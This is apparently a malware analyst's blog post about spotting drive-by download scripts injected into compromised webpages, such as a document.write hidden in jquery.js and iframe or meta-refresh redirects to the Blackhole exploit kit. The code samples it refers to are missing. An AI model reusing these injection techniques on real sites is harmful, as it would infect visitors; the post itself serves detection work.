Oftentimes, these scripts can be found at the top or the bottom of the webpage:
Lately, however, I’m noticing that it’s getting harder to find them. Here’s a couple from just this week alone!
In this drive-by, the malicious script was buried in the “jquery.js” file. Do you see it? I nearly missed it myself. (Hint: look for the document.write statement.)
I’m trying to develop a method of identifying malicious scripts and work backwards to locate where they came from. The first hurdle is trying to identify the malicious script. As a malware analyst, we can mostly recognize that a script is suspicious just by looking at it. Here’s an example:
Here are results from actual drive-bys using the above methodology:
In this drive-by, there was an iframe to Blackhole from the main website.
Last one. The main webpage loaded a local file via an iframe which had a meta refresh tag to Blackhole.
Looks promising but I still need to figure out how to find those pesky malicious needles in the proverbial haystack.